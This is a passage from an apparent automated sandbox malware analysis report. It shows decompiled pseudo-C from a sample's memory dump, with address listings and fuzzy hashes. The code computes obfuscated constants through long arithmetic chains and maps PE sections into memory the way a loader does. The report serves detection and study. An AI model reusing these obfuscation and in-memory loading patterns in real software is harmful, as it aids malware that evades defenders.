                                                                                                                                                                            						}
                                                                                                                                                                            						return _t257;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t257 = E02F5A445();
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				E02F51CA1(_v1112, _v1132, _v1072,  &_v520);
                                                                                                                                                                            				E02F6654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
                                                                                                                                                                            				_t294 =  &(_t294[5]);
                                                                                                                                                                            				_t260 = 0x9631a61;
                                                                                                                                                                            				goto L13;
                                                                                                                                                                            			}










































                                                                                                                                                                            0x02f627f9
                                                                                                                                                                            0x02f627ff
                                                                                                                                                                            0x02f62809
                                                                                                                                                                            0x02f6280e
                                                                                                                                                                            0x02f62813
                                                                                                                                                                            0x02f6281b
                                                                                                                                                                            0x02f62823
                                                                                                                                                                            0x02f62831
                                                                                                                                                                            0x02f62835
                                                                                                                                                                            0x02f6283d
                                                                                                                                                                            0x02f6284b
                                                                                                                                                                            0x02f62850
                                                                                                                                                                            0x02f62856
                                                                                                                                                                            0x02f6285e
                                                                                                                                                                            0x02f62866
                                                                                                                                                                            0x02f6286b
                                                                                                                                                                            0x02f62873
                                                                                                                                                                            0x02f62880
                                                                                                                                                                            0x02f62883
                                                                                                                                                                            0x02f62887
                                                                                                                                                                            0x02f6288c
                                                                                                                                                                            0x02f62894
                                                                                                                                                                            0x02f6289c
                                                                                                                                                                            0x02f628ac
                                                                                                                                                                            0x02f628b0
                                                                                                                                                                            0x02f628b8
                                                                                                                                                                            0x02f628c0
                                                                                                                                                                            0x02f628c8
                                                                                                                                                                            0x02f628d0
                                                                                                                                                                            0x02f628dc
                                                                                                                                                                            0x02f628df
                                                                                                                                                                            0x02f628e3
                                                                                                                                                                            0x02f628eb
                                                                                                                                                                            0x02f628f3
                                                                                                                                                                            0x02f628fd
                                                                                                                                                                            0x02f62901
                                                                                                                                                                            0x02f62909
                                                                                                                                                                            0x02f62911
                                                                                                                                                                            0x02f6291e
                                                                                                                                                                            0x02f62922
                                                                                                                                                                            0x02f6292a
                                                                                                                                                                            0x02f62937
                                                                                                                                                                            0x02f6293b
                                                                                                                                                                            0x02f62943
                                                                                                                                                                            0x02f62948
                                                                                                                                                                            0x02f62950
                                                                                                                                                                            0x02f62958
                                                                                                                                                                            0x02f62960
                                                                                                                                                                            0x02f62968
                                                                                                                                                                            0x02f62970
                                                                                                                                                                            0x02f62978
                                                                                                                                                                            0x02f62985
                                                                                                                                                                            0x02f62989
                                                                                                                                                                            0x02f62991
                                                                                                                                                                            0x02f62999
                                                                                                                                                                            0x02f629a1
                                                                                                                                                                            0x02f629a9
                                                                                                                                                                            0x02f629b1
                                                                                                                                                                            0x02f629be
                                                                                                                                                                            0x02f629c2
                                                                                                                                                                            0x02f629cc
                                                                                                                                                                            0x02f629d9
                                                                                                                                                                            0x02f629e3
                                                                                                                                                                            0x02f629f0
                                                                                                                                                                            0x02f629f8
                                                                                                                                                                            0x02f62a00
                                                                                                                                                                            0x02f62a08
                                                                                                                                                                            0x02f62a10
                                                                                                                                                                            0x02f62a18
                                                                                                                                                                            0x02f62a20
                                                                                                                                                                            0x02f62a28
                                                                                                                                                                            0x02f62a33
                                                                                                                                                                            0x02f62a36
                                                                                                                                                                            0x02f62a3a
                                                                                                                                                                            0x02f62a42
                                                                                                                                                                            0x02f62a4a
                                                                                                                                                                            0x02f62a52
                                                                                                                                                                            0x02f62a5a
                                                                                                                                                                            0x02f62a62
                                                                                                                                                                            0x02f62a6c
                                                                                                                                                                            0x02f62a70
                                                                                                                                                                            0x02f62a78
                                                                                                                                                                            0x02f62a80
                                                                                                                                                                            0x02f62a88
                                                                                                                                                                            0x02f62a8d
                                                                                                                                                                            0x02f62a95
                                                                                                                                                                            0x02f62a9d
                                                                                                                                                                            0x02f62aa2
                                                                                                                                                                            0x02f62aaa
                                                                                                                                                                            0x02f62ab2
                                                                                                                                                                            0x02f62aba
                                                                                                                                                                            0x02f62ac2
                                                                                                                                                                            0x02f62aca
                                                                                                                                                                            0x02f62acf
                                                                                                                                                                            0x02f62ad4
                                                                                                                                                                            0x02f62adc
                                                                                                                                                                            0x02f62ae4
                                                                                                                                                                            0x02f62ae9
                                                                                                                                                                            0x02f62aee
                                                                                                                                                                            0x02f62af6
                                                                                                                                                                            0x02f62afe
                                                                                                                                                                            0x02f62b06
                                                                                                                                                                            0x02f62b0e
                                                                                                                                                                            0x02f62b16
                                                                                                                                                                            0x02f62b1e
                                                                                                                                                                            0x02f62b26
                                                                                                                                                                            0x02f62b2b
                                                                                                                                                                            0x02f62b33
                                                                                                                                                                            0x02f62b41
                                                                                                                                                                            0x02f62c06
                                                                                                                                                                            0x02f62b70
                                                                                                                                                                            0x02f62b70
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62b70
                                                                                                                                                                            0x02f62b4d
                                                                                                                                                                            0x02f62c70
                                                                                                                                                                            0x02f62c7d
                                                                                                                                                                            0x02f62c7f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62c8e
                                                                                                                                                                            0x02f62b55
                                                                                                                                                                            0x02f62b84
                                                                                                                                                                            0x02f62b8d
                                                                                                                                                                            0x02f62b91
                                                                                                                                                                            0x02f62b99
                                                                                                                                                                            0x02f62b9e
                                                                                                                                                                            0x02f62bc3
                                                                                                                                                                            0x02f62bd6
                                                                                                                                                                            0x02f62bf0
                                                                                                                                                                            0x02f62bf5
                                                                                                                                                                            0x02f62bf8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62bf8
                                                                                                                                                                            0x02f62b5d
                                                                                                                                                                            0x02f62b74
                                                                                                                                                                            0x02f62b7b
                                                                                                                                                                            0x02f62b7f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62b7f
                                                                                                                                                                            0x02f62b61
                                                                                                                                                                            0x02f62c52
                                                                                                                                                                            0x02f62c52
                                                                                                                                                                            0x02f62c58
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62c58
                                                                                                                                                                            0x02f62b6b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62b6b
                                                                                                                                                                            0x02f62c24
                                                                                                                                                                            0x02f62c45
                                                                                                                                                                            0x02f62c4a
                                                                                                                                                                            0x02f62c4d
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
                                                                                                                                                                            • API String ID: 0-2581693823
                                                                                                                                                                            • Opcode ID: 148c24cc5eac99cc9855c325bc66d586863c453f377eaf513d2927a7a8aa6e7a
                                                                                                                                                                            • Instruction ID: 5808d112e1429ee366edb262d405834bd5490e218b9504ce117542e6f1c74fb3
                                                                                                                                                                            • Opcode Fuzzy Hash: 148c24cc5eac99cc9855c325bc66d586863c453f377eaf513d2927a7a8aa6e7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 09C110714093419FC368CF25C98951BBBF1FBD4798F108A1DF69696260D7B18A09CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E02F73263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				void* _t171;
                                                                                                                                                                            				void* _t188;
                                                                                                                                                                            				void* _t198;
                                                                                                                                                                            				void* _t200;
                                                                                                                                                                            				signed int _t202;
                                                                                                                                                                            				signed int _t203;
                                                                                                                                                                            				signed int _t204;
                                                                                                                                                                            				signed int _t205;
                                                                                                                                                                            				signed int _t206;
                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                            				void* _t233;
                                                                                                                                                                            				void* _t238;
                                                                                                                                                                            				signed int* _t242;
                                                                                                                                                                            				signed int* _t243;
                                                                                                                                                                            				signed int* _t244;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_t240 = _a4;
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t171);
                                                                                                                                                                            				_v52 = 0x577e5f;
                                                                                                                                                                            				_v52 = _v52 >> 2;
                                                                                                                                                                            				_v52 = _v52 >> 2;
                                                                                                                                                                            				_t202 = 0x5a;
                                                                                                                                                                            				_v52 = _v52 / _t202;
                                                                                                                                                                            				_v52 = _v52 ^ 0x00001f8d;
                                                                                                                                                                            				_v56 = 0xc1a783;
                                                                                                                                                                            				_v56 = _v56 | 0xd091f394;
                                                                                                                                                                            				_t203 = 0x7d;
                                                                                                                                                                            				_v56 = _v56 / _t203;
                                                                                                                                                                            				_v56 = _v56 >> 0xa;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00004aea;
                                                                                                                                                                            				_v36 = 0x5ab329;
                                                                                                                                                                            				_v36 = _v36 | 0xfb978afd;
                                                                                                                                                                            				_v36 = _v36 << 0xc;
                                                                                                                                                                            				_v36 = _v36 << 5;
                                                                                                                                                                            				_v36 = _v36 ^ 0x77fa0040;
                                                                                                                                                                            				_v60 = 0xfb6851;
                                                                                                                                                                            				_t204 = 0x5f;
                                                                                                                                                                            				_v60 = _v60 / _t204;
                                                                                                                                                                            				_v60 = _v60 + 0xffff827f;
                                                                                                                                                                            				_v60 = _v60 + 0xffffffdf;
                                                                                                                                                                            				_v60 = _v60 ^ 0x000cafd7;
                                                                                                                                                                            				_v24 = 0xe59b9d;
                                                                                                                                                                            				_v24 = _v24 + 0x8cf1;
                                                                                                                                                                            				_v24 = _v24 << 0xd;
                                                                                                                                                                            				_v24 = _v24 ^ 0xc51da5fe;
                                                                                                                                                                            				_v40 = 0x4a3359;
                                                                                                                                                                            				_v40 = _v40 + 0xb1f1;
                                                                                                                                                                            				_v40 = _v40 ^ 0xc176e2ad;
                                                                                                                                                                            				_v40 = _v40 << 0xb;
                                                                                                                                                                            				_v40 = _v40 ^ 0xe0393f27;
                                                                                                                                                                            				_v44 = 0x442ad8;
                                                                                                                                                                            				_v44 = _v44 + 0xffffa8db;
                                                                                                                                                                            				_v44 = _v44 ^ 0xa2d0149a;
                                                                                                                                                                            				_v44 = _v44 | 0x2bbd0b31;
                                                                                                                                                                            				_v44 = _v44 ^ 0xabb0f764;
                                                                                                                                                                            				_v20 = 0x80424;
                                                                                                                                                                            				_v20 = _v20 + 0xffff6539;
                                                                                                                                                                            				_v20 = _v20 + 0xd5f9;
                                                                                                                                                                            				_v20 = _v20 ^ 0x000cf2ae;
                                                                                                                                                                            				_v48 = 0x677157;
                                                                                                                                                                            				_v48 = _v48 + 0xec21;
                                                                                                                                                                            				_v48 = _v48 ^ 0x036b165d;
                                                                                                                                                                            				_t205 = 0x14;
                                                                                                                                                                            				_v48 = _v48 / _t205;
                                                                                                                                                                            				_v48 = _v48 ^ 0x002fc559;
                                                                                                                                                                            				_v16 = 0xa7ae7b;
                                                                                                                                                                            				_v16 = _v16 | 0x7198ce36;
                                                                                                                                                                            				_v16 = _v16 << 1;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe373c07b;
                                                                                                                                                                            				_v32 = 0xbd3d32;
                                                                                                                                                                            				_v32 = _v32 | 0x84fa4a87;
                                                                                                                                                                            				_v32 = _v32 * 0xf;
                                                                                                                                                                            				_t206 = 0x34;
                                                                                                                                                                            				_v32 = _v32 * 0x4e;
                                                                                                                                                                            				_v32 = _v32 ^ 0xd7bdec0b;
                                                                                                                                                                            				_v8 = 0x4158ae;
                                                                                                                                                                            				_v8 = _v8 / _t206;
                                                                                                                                                                            				_v8 = _v8 ^ 0x000847ec;
                                                                                                                                                                            				_v28 = 0x8e7645;
                                                                                                                                                                            				_v28 = _v28 + 0xffff0216;
                                                                                                                                                                            				_v28 = _v28 + 0x7276;
                                                                                                                                                                            				_t207 = 0x60;
                                                                                                                                                                            				_v28 = _v28 * 0x4a;
                                                                                                                                                                            				_v28 = _v28 ^ 0x290f0829;
                                                                                                                                                                            				_v4 = 0x80a154;
                                                                                                                                                                            				_v4 = _v4 ^ 0x762c831e;
                                                                                                                                                                            				_v4 = _v4 ^ 0x76a70d93;
                                                                                                                                                                            				_v12 = 0x206e81;
                                                                                                                                                                            				_v12 = _v12 / _t207;
                                                                                                                                                                            				_v12 = _v12 + 0xffffa107;
                                                                                                                                                                            				_v12 = _v12 ^ 0xffff9c06;
                                                                                                                                                                            				_t208 = _v60;
                                                                                                                                                                            				_t188 = E02F7287F(_v60, _a4, _v24);
                                                                                                                                                                            				_t198 = _t188;
                                                                                                                                                                            				_t242 =  &(( &_v60)[7]);
                                                                                                                                                                            				if(_t198 != 0) {
                                                                                                                                                                            					_t233 = E02F662C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
                                                                                                                                                                            					_t243 =  &(_t242[6]);
                                                                                                                                                                            					if(_t233 == 0) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						return _t233;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F6C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
                                                                                                                                                                            					_t244 =  &(_t243[4]);
                                                                                                                                                                            					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
                                                                                                                                                                            					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
                                                                                                                                                                            					while(_t238 < _t200) {
                                                                                                                                                                            						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
                                                                                                                                                                            						E02F6C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
                                                                                                                                                                            						_t244 =  &(_t244[4]);
                                                                                                                                                                            						_t238 = _t238 + 0x28;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t188;
                                                                                                                                                                            			}

































                                                                                                                                                                            0x02f73268
                                                                                                                                                                            0x02f7326c
                                                                                                                                                                            0x02f73270
                                                                                                                                                                            0x02f73272
                                                                                                                                                                            0x02f73276
                                                                                                                                                                            0x02f73277
                                                                                                                                                                            0x02f73278
                                                                                                                                                                            0x02f73279
                                                                                                                                                                            0x02f7327e
                                                                                                                                                                            0x02f73288
                                                                                                                                                                            0x02f7328d
                                                                                                                                                                            0x02f73298
                                                                                                                                                                            0x02f7329d
                                                                                                                                                                            0x02f732a3
                                                                                                                                                                            0x02f732ab
                                                                                                                                                                            0x02f732b3
                                                                                                                                                                            0x02f732bf
                                                                                                                                                                            0x02f732c4
                                                                                                                                                                            0x02f732ca
                                                                                                                                                                            0x02f732cf
                                                                                                                                                                            0x02f732d7
                                                                                                                                                                            0x02f732df
                                                                                                                                                                            0x02f732e7
                                                                                                                                                                            0x02f732ec
                                                                                                                                                                            0x02f732f1
                                                                                                                                                                            0x02f732f9
                                                                                                                                                                            0x02f73305
                                                                                                                                                                            0x02f7330a
                                                                                                                                                                            0x02f73310
                                                                                                                                                                            0x02f73318
                                                                                                                                                                            0x02f7331d
                                                                                                                                                                            0x02f73325
                                                                                                                                                                            0x02f7332d
                                                                                                                                                                            0x02f73335
                                                                                                                                                                            0x02f7333a
                                                                                                                                                                            0x02f73342
                                                                                                                                                                            0x02f7334a
                                                                                                                                                                            0x02f73352
                                                                                                                                                                            0x02f7335a
                                                                                                                                                                            0x02f7335f
                                                                                                                                                                            0x02f73367
                                                                                                                                                                            0x02f7336f
                                                                                                                                                                            0x02f73377
                                                                                                                                                                            0x02f7337f
                                                                                                                                                                            0x02f73387
                                                                                                                                                                            0x02f7338f
                                                                                                                                                                            0x02f73397
                                                                                                                                                                            0x02f7339f
                                                                                                                                                                            0x02f733a7
                                                                                                                                                                            0x02f733af
                                                                                                                                                                            0x02f733b7
                                                                                                                                                                            0x02f733bf
                                                                                                                                                                            0x02f733cb
                                                                                                                                                                            0x02f733ce
                                                                                                                                                                            0x02f733d2
                                                                                                                                                                            0x02f733da
                                                                                                                                                                            0x02f733e2
                                                                                                                                                                            0x02f733ea
                                                                                                                                                                            0x02f733ee
                                                                                                                                                                            0x02f733f6
                                                                                                                                                                            0x02f733fe
                                                                                                                                                                            0x02f7340b
                                                                                                                                                                            0x02f73418
                                                                                                                                                                            0x02f7341b
                                                                                                                                                                            0x02f7341f
                                                                                                                                                                            0x02f73427
                                                                                                                                                                            0x02f73437
                                                                                                                                                                            0x02f7343b
                                                                                                                                                                            0x02f73443
                                                                                                                                                                            0x02f7344b
                                                                                                                                                                            0x02f73453
                                                                                                                                                                            0x02f73460
                                                                                                                                                                            0x02f73461
                                                                                                                                                                            0x02f73465
                                                                                                                                                                            0x02f7346d
                                                                                                                                                                            0x02f73475
                                                                                                                                                                            0x02f7347d
                                                                                                                                                                            0x02f73485
                                                                                                                                                                            0x02f73495
                                                                                                                                                                            0x02f73499
                                                                                                                                                                            0x02f734a1
                                                                                                                                                                            0x02f734ad
                                                                                                                                                                            0x02f734b1
                                                                                                                                                                            0x02f734b6
                                                                                                                                                                            0x02f734b8
                                                                                                                                                                            0x02f734bd
                                                                                                                                                                            0x02f734ea
                                                                                                                                                                            0x02f734ec
                                                                                                                                                                            0x02f734f1
                                                                                                                                                                            0x02f73557
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73559
                                                                                                                                                                            0x02f73508
                                                                                                                                                                            0x02f73511
                                                                                                                                                                            0x02f7351b
                                                                                                                                                                            0x02f73520
                                                                                                                                                                            0x02f73552
                                                                                                                                                                            0x02f7353a
                                                                                                                                                                            0x02f73547
                                                                                                                                                                            0x02f7354c
                                                                                                                                                                            0x02f7354f
                                                                                                                                                                            0x02f7354f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f73556
                                                                                                                                                                            0x02f7355f

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: !$$P$'?9$@$Wqg$_~W$vr$J
                                                                                                                                                                            • API String ID: 0-3966742547
                                                                                                                                                                            • Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                                                                                                                                                                            • Instruction ID: 1296706d99a7a678e79b0e8bcc1a85ddaef58d130f725d245ecde5c6f2eb8b47
                                                                                                                                                                            • Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                                                                                                                                                                            • Instruction Fuzzy Hash: 32814172508340AFC358CF66C88991BBBF2FBC5758F109A1DFA9986260D3B6D945CF06
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F717BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				char _v1560;
                                                                                                                                                                            				intOrPtr _v1564;
                                                                                                                                                                            				intOrPtr _v1568;
                                                                                                                                                                            				intOrPtr _v1572;
                                                                                                                                                                            				intOrPtr _v1576;
                                                                                                                                                                            				signed int _v1580;
                                                                                                                                                                            				signed int _v1584;
                                                                                                                                                                            				signed int _v1588;
                                                                                                                                                                            				signed int _v1592;
                                                                                                                                                                            				signed int _v1596;
                                                                                                                                                                            				signed int _v1600;
                                                                                                                                                                            				signed int _v1604;
                                                                                                                                                                            				signed int _v1608;
                                                                                                                                                                            				signed int _v1612;
                                                                                                                                                                            				signed int _v1616;
                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                            				signed int _v1624;
                                                                                                                                                                            				signed int _v1628;
                                                                                                                                                                            				signed int _v1632;
                                                                                                                                                                            				signed int _v1636;
                                                                                                                                                                            				signed int _v1640;
                                                                                                                                                                            				signed int _v1644;
                                                                                                                                                                            				signed int _v1648;
                                                                                                                                                                            				signed int _v1652;
                                                                                                                                                                            				signed int _v1656;
                                                                                                                                                                            				signed int _v1660;
                                                                                                                                                                            				signed int _v1664;
                                                                                                                                                                            				signed int _v1668;
                                                                                                                                                                            				signed int _v1672;
                                                                                                                                                                            				signed int _v1676;
                                                                                                                                                                            				signed int _v1680;
                                                                                                                                                                            				signed int _v1684;
                                                                                                                                                                            				signed int _v1688;
                                                                                                                                                                            				signed int _v1692;
                                                                                                                                                                            				signed int _v1696;
                                                                                                                                                                            				signed int _v1700;
                                                                                                                                                                            				signed int _v1704;
                                                                                                                                                                            				signed int _v1708;
                                                                                                                                                                            				signed int _v1712;
                                                                                                                                                                            				signed int _v1716;
                                                                                                                                                                            				signed int _v1720;
                                                                                                                                                                            				signed int _v1724;
                                                                                                                                                                            				signed int _v1728;
                                                                                                                                                                            				void* _t369;
                                                                                                                                                                            				void* _t397;
                                                                                                                                                                            				intOrPtr _t400;
                                                                                                                                                                            				intOrPtr _t402;
                                                                                                                                                                            				void* _t412;
                                                                                                                                                                            				intOrPtr _t415;
                                                                                                                                                                            				intOrPtr _t419;
                                                                                                                                                                            				void* _t425;
                                                                                                                                                                            				intOrPtr _t462;
                                                                                                                                                                            				signed int _t463;
                                                                                                                                                                            				signed int _t464;
                                                                                                                                                                            				signed int _t465;
                                                                                                                                                                            				signed int _t466;
                                                                                                                                                                            				signed int _t467;
                                                                                                                                                                            				signed int _t468;
                                                                                                                                                                            				signed int _t469;
                                                                                                                                                                            				signed int _t470;
                                                                                                                                                                            				signed int* _t475;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t462 = 0;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t369);
                                                                                                                                                                            				_v1576 = 0x13bb59;
                                                                                                                                                                            				_t475 =  &(( &_v1728)[4]);
                                                                                                                                                                            				_v1572 = 0x74d317;
                                                                                                                                                                            				_v1568 = 0x8520ae;
                                                                                                                                                                            				_t425 = 0xbbc45e7;
                                                                                                                                                                            				_v1564 = 0;
                                                                                                                                                                            				_v1636 = 0xff081c;
                                                                                                                                                                            				_v1636 = _v1636 + 0xffff5aa8;
                                                                                                                                                                            				_v1636 = _v1636 | 0xdf687e40;
                                                                                                                                                                            				_v1636 = _v1636 ^ 0xdffe7eed;
                                                                                                                                                                            				_v1592 = 0x1eb670;
                                                                                                                                                                            				_t463 = 3;
                                                                                                                                                                            				_v1592 = _v1592 / _t463;
                                                                                                                                                                            				_v1592 = _v1592 ^ 0x000911f1;
                                                                                                                                                                            				_v1588 = 0xd7f028;
                                                                                                                                                                            				_v1588 = _v1588 + 0x99cf;
                                                                                                                                                                            				_v1588 = _v1588 ^ 0x00d6a0ad;
                                                                                                                                                                            				_v1668 = 0xda1be6;
                                                                                                                                                                            				_v1668 = _v1668 >> 0xa;
                                                                                                                                                                            				_v1668 = _v1668 + 0xb82c;
                                                                                                                                                                            				_v1668 = _v1668 + 0xffff3cb9;
                                                                                                                                                                            				_v1668 = _v1668 ^ 0x000447cb;
                                                                                                                                                                            				_v1700 = 0x2ba1ed;
                                                                                                                                                                            				_v1700 = _v1700 << 6;
                                                                                                                                                                            				_v1700 = _v1700 + 0xffff6a87;
                                                                                                                                                                            				_v1700 = _v1700 >> 0xf;
                                                                                                                                                                            				_v1700 = _v1700 ^ 0x000ca1a2;
                                                                                                                                                                            				_v1600 = 0xfc0906;
                                                                                                                                                                            				_v1600 = _v1600 >> 0xe;
                                                                                                                                                                            				_v1600 = _v1600 ^ 0x000a9240;
                                                                                                                                                                            				_v1692 = 0xcdddf3;
                                                                                                                                                                            				_v1692 = _v1692 | 0x4624ceaf;
                                                                                                                                                                            				_v1692 = _v1692 >> 0xc;
                                                                                                                                                                            				_v1692 = _v1692 | 0xae0b3fef;
                                                                                                                                                                            				_v1692 = _v1692 ^ 0xae09d891;
                                                                                                                                                                            				_v1652 = 0xd6e5ef;
                                                                                                                                                                            				_v1652 = _v1652 + 0xffffecd6;
                                                                                                                                                                            				_t464 = 0x1f;
                                                                                                                                                                            				_v1652 = _v1652 * 0x1b;
                                                                                                                                                                            				_v1652 = _v1652 ^ 0x16a7acad;
                                                                                                                                                                            				_v1724 = 0x640b42;
                                                                                                                                                                            				_v1724 = _v1724 + 0x7af0;
                                                                                                                                                                            				_v1724 = _v1724 + 0xd7a0;
                                                                                                                                                                            				_v1724 = _v1724 / _t464;
                                                                                                                                                                            				_v1724 = _v1724 ^ 0x00003baa;
                                                                                                                                                                            				_v1644 = 0x5d7e02;
                                                                                                                                                                            				_v1644 = _v1644 ^ 0x280f1fa3;
                                                                                                                                                                            				_v1644 = _v1644 | 0x80dcb776;
                                                                                                                                                                            				_v1644 = _v1644 ^ 0xa8d7b48e;
                                                                                                                                                                            				_v1612 = 0x310401;
                                                                                                                                                                            				_v1612 = _v1612 << 0xc;
                                                                                                                                                                            				_v1612 = _v1612 ^ 0x10456323;
                                                                                                                                                                            				_v1708 = 0xec7d3e;
                                                                                                                                                                            				_v1708 = _v1708 + 0xffff4756;
                                                                                                                                                                            				_t465 = 0x19;
                                                                                                                                                                            				_v1708 = _v1708 / _t465;
                                                                                                                                                                            				_v1708 = _v1708 * 0x78;
                                                                                                                                                                            				_v1708 = _v1708 ^ 0x04625198;
                                                                                                                                                                            				_v1676 = 0xc1499c;
                                                                                                                                                                            				_v1676 = _v1676 + 0x787f;
                                                                                                                                                                            				_v1676 = _v1676 >> 7;
                                                                                                                                                                            				_v1676 = _v1676 >> 0xd;
                                                                                                                                                                            				_v1676 = _v1676 ^ 0x0006bbad;
                                                                                                                                                                            				_v1620 = 0xc8864f;
                                                                                                                                                                            				_v1620 = _v1620 + 0xdb64;
                                                                                                                                                                            				_t466 = 0x71;
                                                                                                                                                                            				_v1620 = _v1620 / _t466;
                                                                                                                                                                            				_v1620 = _v1620 ^ 0x00054ec4;
                                                                                                                                                                            				_v1716 = 0x58bfc6;
                                                                                                                                                                            				_v1716 = _v1716 << 0xc;
                                                                                                                                                                            				_v1716 = _v1716 << 6;
                                                                                                                                                                            				_v1716 = _v1716 >> 0xa;
                                                                                                                                                                            				_v1716 = _v1716 ^ 0x00309503;
                                                                                                                                                                            				_v1584 = 0x2a66b4;
                                                                                                                                                                            				_t467 = 0x6c;
                                                                                                                                                                            				_v1584 = _v1584 * 0x62;
                                                                                                                                                                            				_v1584 = _v1584 ^ 0x103c6d70;
                                                                                                                                                                            				_v1628 = 0xcd0e9a;
                                                                                                                                                                            				_v1628 = _v1628 + 0xffff6b98;
                                                                                                                                                                            				_v1628 = _v1628 + 0xffffdc7c;
                                                                                                                                                                            				_v1628 = _v1628 ^ 0x00cd4883;
                                                                                                                                                                            				_v1684 = 0x7bfe73;
                                                                                                                                                                            				_v1684 = _v1684 >> 5;
                                                                                                                                                                            				_v1684 = _v1684 << 7;
                                                                                                                                                                            				_v1684 = _v1684 * 0x31;
                                                                                                                                                                            				_v1684 = _v1684 ^ 0x5ee8daf9;
                                                                                                                                                                            				_v1660 = 0x1f1c01;
                                                                                                                                                                            				_v1660 = _v1660 >> 4;
                                                                                                                                                                            				_v1660 = _v1660 / _t467;
                                                                                                                                                                            				_v1660 = _v1660 ^ 0x000ccbd2;
                                                                                                                                                                            				_v1720 = 0x840fb2;
                                                                                                                                                                            				_v1720 = _v1720 | 0xa69eff81;
                                                                                                                                                                            				_v1720 = _v1720 << 0xe;
                                                                                                                                                                            				_v1720 = _v1720 + 0xffff3037;
                                                                                                                                                                            				_v1720 = _v1720 ^ 0xbfecb97e;
                                                                                                                                                                            				_v1656 = 0xd8a297;
                                                                                                                                                                            				_v1656 = _v1656 + 0x41c1;
